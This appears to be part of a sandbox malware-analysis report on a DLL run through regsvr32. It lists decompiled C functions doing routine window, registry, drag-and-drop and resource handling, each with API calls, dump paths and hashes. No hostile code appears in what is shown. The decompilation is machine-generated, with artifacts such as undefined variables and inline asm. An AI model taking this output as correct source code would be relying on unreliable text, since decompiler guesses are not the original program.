                                                                                                            • String ID:
                                                                                                            • API String ID: 2204725058-0
                                                                                                            • Opcode ID: 203580147984b863afd1059a40c53a8fb6a82f7499a9f31233211a8b075018b0
                                                                                                            • Instruction ID: b169f4ebd7b1781a2425983f4991e3855304b76673034f1eafd2744fb62dc6a9
                                                                                                            • Opcode Fuzzy Hash: 203580147984b863afd1059a40c53a8fb6a82f7499a9f31233211a8b075018b0
                                                                                                            • Instruction Fuzzy Hash: D3014F3A600615BFDB12FB59CC44DAE7BB9EF89690B11416AF901DB211EB30DE40DB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 62%
                                                                                                            			E10022B16(struct HWND__* _a4, int _a8, int _a12, long _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                            				void* __ebp;
                                                                                                            				struct HWND__* _t16;
                                                                                                            				void* _t20;
                                                                                                            				struct HWND__* _t23;
                                                                                                            
                                                                                                            				_t16 = GetTopWindow(_a4);
                                                                                                            				while(1) {
                                                                                                            					_t23 = _t16;
                                                                                                            					if(_t23 == 0) {
                                                                                                            						break;
                                                                                                            					}
                                                                                                            					if(_a24 == 0) {
                                                                                                            						SendMessageA(_t23, _a8, _a12, _a16);
                                                                                                            					} else {
                                                                                                            						_push(_t23);
                                                                                                            						_t20 = E10022115();
                                                                                                            						if(_t20 != 0) {
                                                                                                            							_push(_a16);
                                                                                                            							_push(_a12);
                                                                                                            							_push(_a8);
                                                                                                            							_push( *((intOrPtr*)(_t20 + 0x1c)));
                                                                                                            							_push(_t20);
                                                                                                            							E1002283F();
                                                                                                            						}
                                                                                                            					}
                                                                                                            					if(_a20 != 0 && GetTopWindow(_t23) != 0) {
                                                                                                            						E10022B16(_t23, _a8, _a12, _a16, _a20, _a24);
                                                                                                            					}
                                                                                                            					_t16 = GetWindow(_t23, 2);
                                                                                                            				}
                                                                                                            				return _t16;
                                                                                                            			}








                                                                                                            APIs
                                                                                                            • GetTopWindow.USER32(?), ref: 10022B24
                                                                                                            • GetTopWindow.USER32(00000000), ref: 10022B63
                                                                                                            • GetWindow.USER32(00000000,00000002), ref: 10022B81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window
                                                                                                            • String ID:
                                                                                                            • API String ID: 2353593579-0
                                                                                                            • Opcode ID: f20903795edc35669258cf1f74e1e4e851f1226be1756a02d54bb3e882155ab8
                                                                                                            • Instruction ID: 59ebec99428bed81cbae9e399db4f0855efa5802a24bdab8832a78d2f0a6533d
                                                                                                            • Opcode Fuzzy Hash: f20903795edc35669258cf1f74e1e4e851f1226be1756a02d54bb3e882155ab8
                                                                                                            • Instruction Fuzzy Hash: FC01A93600151ABBDF13AFE1AC05EDF3B6AEF45391F814011FA1455062C736D971EBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 95%
                                                                                                            			E10022422(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
                                                                                                            				void* __ebp;
                                                                                                            				struct HWND__* _t10;
                                                                                                            				void* _t13;
                                                                                                            				struct HWND__* _t15;
                                                                                                            				struct HWND__* _t16;
                                                                                                            				void* _t17;
                                                                                                            
                                                                                                            				_t13 = __ecx;
                                                                                                            				_t15 = GetDlgItem(_a4, _a8);
                                                                                                            				if(_t15 == 0) {
                                                                                                            					L6:
                                                                                                            					_t10 = GetTopWindow(_a4);
                                                                                                            					while(1) {
                                                                                                            						_t16 = _t10;
                                                                                                            						if(_t16 == 0) {
                                                                                                            							goto L10;
                                                                                                            						}
                                                                                                            						_t10 = E10022422(_t13, _t16, _a8, _a12);
                                                                                                            						if(_t10 == 0) {
                                                                                                            							_t10 = GetWindow(_t16, 2);
                                                                                                            							continue;
                                                                                                            						}
                                                                                                            						goto L10;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					if(GetTopWindow(_t15) == 0) {
                                                                                                            						L3:
                                                                                                            						_push(_t15);
                                                                                                            						if(_a12 == 0) {
                                                                                                            							return E100220EE(_t17);
                                                                                                            						}
                                                                                                            						_t10 = E10022115();
                                                                                                            						if(_t10 == 0) {
                                                                                                            							goto L6;
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						_t10 = E10022422(_t13, _t15, _a8, _a12);
                                                                                                            						if(_t10 == 0) {
                                                                                                            							goto L3;
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				L10:
                                                                                                            				return _t10;
                                                                                                            			}










                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32 ref: 1002242D
                                                                                                            • GetTopWindow.USER32(00000000), ref: 10022440
                                                                                                              • Part of subcall function 10022422: GetWindow.USER32(00000000,00000002), ref: 10022487
                                                                                                            • GetTopWindow.USER32(?), ref: 10022470
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Item
                                                                                                            • String ID:
                                                                                                            • API String ID: 369458955-0
                                                                                                            • Opcode ID: b9e1787de5e7a1ed3ad65300bc5edf47a0a497a9be77156916138b2de0f7076e
                                                                                                            • Instruction ID: cbb5f4ea75b5981124a7b3c1720515b8597a7f038d3602274fac482962cbe2a9
                                                                                                            • Opcode Fuzzy Hash: b9e1787de5e7a1ed3ad65300bc5edf47a0a497a9be77156916138b2de0f7076e
                                                                                                            • Instruction Fuzzy Hash: A701623650166BBBDB23BFE2BC00E9F3B99EF462E4F828121FD0499111D731D9629691
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1002B47F(void* __ecx, void* __edi, void* __esi, CHAR* _a4, CHAR* _a8, char _a12) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v24;
                                                                                                            				intOrPtr _t15;
                                                                                                            				long _t22;
                                                                                                            				void* _t31;
                                                                                                            				void* _t32;
                                                                                                            
                                                                                                            				_t15 =  *0x1004c470; // 0xf3933a06
                                                                                                            				_t31 = __ecx;
                                                                                                            				_v8 = _t15;
                                                                                                            				if( *((intOrPtr*)(__ecx + 0x50)) == 0) {
                                                                                                            					wsprintfA( &_v24, 0x1003cc28, _a12);
                                                                                                            					_t19 = WritePrivateProfileStringA(_a4, _a8,  &_v24,  *(_t31 + 0x64));
                                                                                                            				} else {
                                                                                                            					_t32 = E10035959(__ecx, _a4);
                                                                                                            					if(_t32 != 0) {
                                                                                                            						_t22 = RegSetValueExA(_t32, _a8, 0, 4,  &_a12, 4);
                                                                                                            						RegCloseKey(_t32);
                                                                                                            						_t19 = 0 | _t22 == 0x00000000;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return E100117AE(_t19, _v8);
                                                                                                            			}










                                                                                                            APIs
                                                                                                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?), ref: 1002B4B3
                                                                                                            • RegCloseKey.ADVAPI32(00000000,?,?), ref: 1002B4BC
                                                                                                            • wsprintfA.USER32 ref: 1002B4D8
                                                                                                            • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1002B4EE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClosePrivateProfileStringValueWritewsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 1902064621-0
                                                                                                            • Opcode ID: eeff4c081b5401d7091317d7c21aef54044c150afcc127b9d4d19e0a4f1937e9
                                                                                                            • Instruction ID: 9a6bc9ffc77bb201adb5d4a8a8e7071db867b7f7a5a0f8b8952f6efe61c2a51a
                                                                                                            • Opcode Fuzzy Hash: eeff4c081b5401d7091317d7c21aef54044c150afcc127b9d4d19e0a4f1937e9
                                                                                                            • Instruction Fuzzy Hash: A001403250161AEFDB02EFA5CD45E9E3BB8FF44754F044415FA04EB152DB71DA118B90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10031D85(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a4) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v268;
                                                                                                            				int _v272;
                                                                                                            				void* __ebp;
                                                                                                            				intOrPtr _t14;
                                                                                                            				int _t24;
                                                                                                            				intOrPtr* _t30;
                                                                                                            				void* _t33;
                                                                                                            
                                                                                                            				_t14 =  *0x1004c470; // 0xf3933a06
                                                                                                            				_v8 = _t14;
                                                                                                            				E100220EE(_t33, SetActiveWindow( *(__ecx + 0x1c)));
                                                                                                            				_t24 = 0;
                                                                                                            				_v272 = DragQueryFileA(_a4, 0xffffffff, 0, 0);
                                                                                                            				_t30 =  *((intOrPtr*)(E100373B5() + 4));
                                                                                                            				if(_v272 > 0) {
                                                                                                            					do {
                                                                                                            						DragQueryFileA(_a4, _t24,  &_v268, 0x104);
                                                                                                            						_t18 =  *((intOrPtr*)( *_t30 + 0x88))( &_v268);
                                                                                                            						_t24 = _t24 + 1;
                                                                                                            					} while (_t24 < _v272);
                                                                                                            				}
                                                                                                            				DragFinish(_a4);
                                                                                                            				return E100117AE(_t18, _v8);
                                                                                                            			}












                                                                                                            APIs
                                                                                                            • SetActiveWindow.USER32(?), ref: 10031D9C
                                                                                                            • DragQueryFileA.SHELL32(?,000000FF,00000000,00000000,00000000), ref: 10031DB7
                                                                                                            • DragQueryFileA.SHELL32(?,00000000,?,00000104), ref: 10031DDF
                                                                                                            • DragFinish.SHELL32(?), ref: 10031DFE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Drag$FileQuery$ActiveFinishWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 892977027-0
                                                                                                            • Opcode ID: bd7094511bd36670db2e3ffd89ec2879d875733b4acb4b41f2f8ac0a86cb3803
                                                                                                            • Instruction ID: f3efa9f330312ec6ab61e1b0fbe20e019f1dfd30d235b1af0ecd9192f479495c
                                                                                                            • Opcode Fuzzy Hash: bd7094511bd36670db2e3ffd89ec2879d875733b4acb4b41f2f8ac0a86cb3803
                                                                                                            • Instruction Fuzzy Hash: A2016975900228AFDB11DF64CC84DE97BB8EF49354F0081AAF5859B151CA70AE81CFA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100368F3(void* __ecx, signed short _a4, signed short _a8, signed short _a12, signed short _a16) {
                                                                                                            				signed short _t21;
                                                                                                            				void* _t37;
                                                                                                            
                                                                                                            				_t37 = __ecx;
                                                                                                            				if(IsWindow( *(__ecx + 0x1c)) == 0) {
                                                                                                            					 *(_t37 + 0xa8) = _a4;
                                                                                                            					 *(_t37 + 0xac) = _a8;
                                                                                                            					 *(_t37 + 0xa0) = _a12;
                                                                                                            					_t21 = _a16;
                                                                                                            					 *(_t37 + 0xa4) = _t21;
                                                                                                            					return _t21;
                                                                                                            				}
                                                                                                            				SendMessageA( *(_t37 + 0x1c), 0x420, 0, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
                                                                                                            				SendMessageA( *(_t37 + 0x1c), 0x41f, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4 & 0x0000ffff);
                                                                                                            				return InvalidateRect( *(_t37 + 0x1c), 0, 1);
                                                                                                            			}






                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$InvalidateRectWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 3225880595-0
                                                                                                            • Opcode ID: 8d3f6a25381cc96bbc5022150596d566bf0059f3a53c98868d4427e143fea8c6
                                                                                                            • Instruction ID: 4b04fdd573aa0d80c43ff6d8227c2b4f41099026dca325be7ad292e47659670a
                                                                                                            • Opcode Fuzzy Hash: 8d3f6a25381cc96bbc5022150596d566bf0059f3a53c98868d4427e143fea8c6
                                                                                                            • Instruction Fuzzy Hash: 7E015E70200718AFE7218F19DC45FAABBF8EF45751F10842AFD95DA190D6B0F850DB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 37%
                                                                                                            			E10036FD8(short* _a4) {
                                                                                                            				char* _v0;
                                                                                                            				int _v8;
                                                                                                            				char* _v16;
                                                                                                            				int _t6;
                                                                                                            				char* _t7;
                                                                                                            				short* _t11;
                                                                                                            				void* _t12;
                                                                                                            				void* _t16;
                                                                                                            				int _t17;
                                                                                                            
                                                                                                            				_t11 = _a4;
                                                                                                            				if(_t11 != 0) {
                                                                                                            					__imp__#7(_t11, _t12, _t16);
                                                                                                            					_t17 = _t6;
                                                                                                            					_t7 = WideCharToMultiByte(0, 0, _t11, _t17, 0, 0, 0, 0);
                                                                                                            					_v0 = _t7;
                                                                                                            					__imp__#150(0, _t7);
                                                                                                            					_v16 = _t7;
                                                                                                            					WideCharToMultiByte(0, 0, _t11, _t17, _t7, _v8, 0, 0);
                                                                                                            					return _v16;
                                                                                                            				}
                                                                                                            				return 0;
                                                                                                            			}













                                                                                                            APIs
                                                                                                            • SysStringLen.OLEAUT32(?), ref: 10036FEC
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,10039361,00000000), ref: 10037002
                                                                                                            • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 1003700A
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,00000000,?,?,?,?,10039361,00000000), ref: 1003701F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Byte$CharMultiStringWide$Alloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 3384502665-0
                                                                                                            • Opcode ID: c6caf2a32dfc1e22ea364bb6c40de8f05e5bfc3eeddc60a89b546b83931860c7
                                                                                                            • Instruction ID: 594c1e5c48785cf97723a890a7a01ae096917330bd715e74928d8e18aa0a9d1e
                                                                                                            • Opcode Fuzzy Hash: c6caf2a32dfc1e22ea364bb6c40de8f05e5bfc3eeddc60a89b546b83931860c7
                                                                                                            • Instruction Fuzzy Hash: 98F030721062387F92219B679C88CABBFDCFE8B2A5B014919F548C2101C2259901CBF1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10036B96(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                            				char _v16;
                                                                                                            				int _t12;
                                                                                                            				signed int _t16;
                                                                                                            				int _t18;
                                                                                                            				intOrPtr _t19;
                                                                                                            				void* _t24;
                                                                                                            				intOrPtr* _t27;
                                                                                                            
                                                                                                            				_t19 = _a4;
                                                                                                            				_t27 = __ecx;
                                                                                                            				E1002F372(__ecx, _t19, _a8);
                                                                                                            				_t12 = E100202AB(__ecx);
                                                                                                            				if((_t12 & 0x00000001) != 0) {
                                                                                                            					_t12 = IsZoomed(GetParent( *(__ecx + 0x1c)));
                                                                                                            					if(_t12 == 0) {
                                                                                                            						 *((intOrPtr*)( *_t27 + 0x110))(0x407, 0,  &_v16, _t24);
                                                                                                            						_t16 = GetSystemMetrics(5);
                                                                                                            						_t18 = GetSystemMetrics(2);
                                                                                                            						 *((intOrPtr*)(_t19 + 8)) =  *((intOrPtr*)(_t19 + 8)) - (_t16 << 1) - _v16 - _t18;
                                                                                                            						return _t18;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t12;
                                                                                                            			}











                                                                                                            APIs
                                                                                                              • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                                                            • GetParent.USER32(?), ref: 10036BBB
                                                                                                            • IsZoomed.USER32(00000000), ref: 10036BC2
                                                                                                            • GetSystemMetrics.USER32 ref: 10036BEA
                                                                                                            • GetSystemMetrics.USER32 ref: 10036BF8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MetricsSystem$LongParentWindowZoomed
                                                                                                            • String ID:
                                                                                                            • API String ID: 3909876373-0
                                                                                                            • Opcode ID: 68178c6c60ef6917867ce7114bcee81f5725171e5d46bf9d1dfeedfdf515f66b
                                                                                                            • Instruction ID: 7d4475de74911b0f59ada56c103e3f3b6aae8d9b3b29eeb5a8f877c48aa9be1b
                                                                                                            • Opcode Fuzzy Hash: 68178c6c60ef6917867ce7114bcee81f5725171e5d46bf9d1dfeedfdf515f66b
                                                                                                            • Instruction Fuzzy Hash: 3801A736A00214AFDB11ABB9DC49F59BBA8EF44740F018119FA45EB191D670B904CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 54%
                                                                                                            			E1000BFC5(intOrPtr _a4, RECT* _a8, int _a12) {
                                                                                                            				struct tagRECT _v20;
                                                                                                            				intOrPtr _t28;
                                                                                                            
                                                                                                            				_t28 = _a4;
                                                                                                            				if(_a8 != 0) {
                                                                                                            					IntersectRect( &_v20, _a8, _t28 - 0x9c);
                                                                                                            					EqualRect( &_v20, _a8);
                                                                                                            				} else {
                                                                                                            					asm("movsd");
                                                                                                            					asm("movsd");
                                                                                                            					asm("movsd");
                                                                                                            					asm("movsd");
                                                                                                            				}
                                                                                                            				if(IsRectEmpty( &_v20) == 0) {
                                                                                                            					InvalidateRect( *( *((intOrPtr*)( *((intOrPtr*)(_t28 - 0xac)) + 0x1c)) + 0x1c),  &_v20, _a12);
                                                                                                            				}
                                                                                                            				return 0;
                                                                                                            			}






                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$EmptyEqualIntersectInvalidate
                                                                                                            • String ID:
                                                                                                            • API String ID: 3354205298-0
                                                                                                            • Opcode ID: f3fc70dffe40ac54a64bc44e1e78ea87a7d0b2878780ef36980549cbbb75fdb9
                                                                                                            • Instruction ID: 1e794ae20577572ca79bd181089135021f598cd57710f0e7593056f93d140995
                                                                                                            • Opcode Fuzzy Hash: f3fc70dffe40ac54a64bc44e1e78ea87a7d0b2878780ef36980549cbbb75fdb9
                                                                                                            • Instruction Fuzzy Hash: 1601E57290022EEFEF01DFA5CC88EAAB7ADFB09254F018865E914DB115D231E5198B60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100214B2(struct HDC__* _a4, struct HWND__* _a8, intOrPtr _a12, void* _a16, long _a20) {
                                                                                                            				long _v12;
                                                                                                            				void _v16;
                                                                                                            				intOrPtr _t12;
                                                                                                            				long _t16;
                                                                                                            
                                                                                                            				if(_a4 == 0 || _a16 == 0) {
                                                                                                            					L10:
                                                                                                            					return 0;
                                                                                                            				} else {
                                                                                                            					_t12 = _a12;
                                                                                                            					if(_t12 == 1 || _t12 == 0 || _t12 == 5 || _t12 == 2 && E10029A8E(_a8, _t12) == 0) {
                                                                                                            						goto L10;
                                                                                                            					} else {
                                                                                                            						GetObjectA(_a16, 0xc,  &_v16);
                                                                                                            						SetBkColor(_a4, _v12);
                                                                                                            						_t16 = _a20;
                                                                                                            						if(_t16 == 0xffffffff) {
                                                                                                            							_t16 = GetSysColor(8);
                                                                                                            						}
                                                                                                            						SetTextColor(_a4, _t16);
                                                                                                            						return 1;
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}








                                                                                                            APIs
                                                                                                            • GetObjectA.GDI32(00000000,0000000C,?), ref: 100214F0
                                                                                                            • SetBkColor.GDI32(00000000,00000000), ref: 100214FC
                                                                                                            • GetSysColor.USER32(00000008), ref: 1002150C
                                                                                                            • SetTextColor.GDI32(00000000,?), ref: 10021516
                                                                                                              • Part of subcall function 10029A8E: GetWindowLongA.USER32 ref: 10029AA7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$LongObjectTextWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2871169696-0
                                                                                                            • Opcode ID: 270bb4ef9b18727549db2e87848aeeb4d20cea516dda6394fdb349df2a5cdfde
                                                                                                            • Instruction ID: 07a055e2fde14eb44e4b892d4051d3cd351fecf6f4b2367e44398545aae672e6
                                                                                                            • Opcode Fuzzy Hash: 270bb4ef9b18727549db2e87848aeeb4d20cea516dda6394fdb349df2a5cdfde
                                                                                                            • Instruction Fuzzy Hash: 0301283A900529EBEB429FA0EC85AEB3BA4EB55291F908560FD13C40A1C730CD90DB51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1002415A(void* __ecx, CHAR* _a4) {
                                                                                                            				void* __edi;
                                                                                                            				struct HRSRC__* _t8;
                                                                                                            				void* _t9;
                                                                                                            				void* _t11;
                                                                                                            				void* _t14;
                                                                                                            				void* _t15;
                                                                                                            				struct HINSTANCE__* _t16;
                                                                                                            				void* _t17;
                                                                                                            
                                                                                                            				_t14 = 0;
                                                                                                            				_t11 = 0;
                                                                                                            				_t17 = __ecx;
                                                                                                            				if(_a4 == 0) {
                                                                                                            					L4:
                                                                                                            					_t15 = E100232BF(_t17, _t14, _t11);
                                                                                                            					if(_t11 != 0 && _t14 != 0) {
                                                                                                            						FreeResource(_t14);
                                                                                                            					}
                                                                                                            					return _t15;
                                                                                                            				}
                                                                                                            				_t16 =  *(E100373B5() + 0xc);
                                                                                                            				_t8 = FindResourceA(_t16, _a4, 0xf0);
                                                                                                            				if(_t8 == 0) {
                                                                                                            					goto L4;
                                                                                                            				}
                                                                                                            				_t9 = LoadResource(_t16, _t8);
                                                                                                            				_t14 = _t9;
                                                                                                            				if(_t14 != 0) {
                                                                                                            					_t11 = LockResource(_t14);
                                                                                                            					goto L4;
                                                                                                            				}
                                                                                                            				return _t9;
                                                                                                            			}












                                                                                                            APIs
                                                                                                            • FindResourceA.KERNEL32(?,?,000000F0), ref: 1002417C
                                                                                                            • LoadResource.KERNEL32(?,00000000,?,?,?,?,1001EFB5,?,?,10006635), ref: 10024188
                                                                                                            • LockResource.KERNEL32(00000000,?,?,?,?,1001EFB5,?,?,10006635), ref: 10024195
                                                                                                            • FreeResource.KERNEL32(00000000,?,?,?,?,1001EFB5,?,?,10006635), ref: 100241B0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
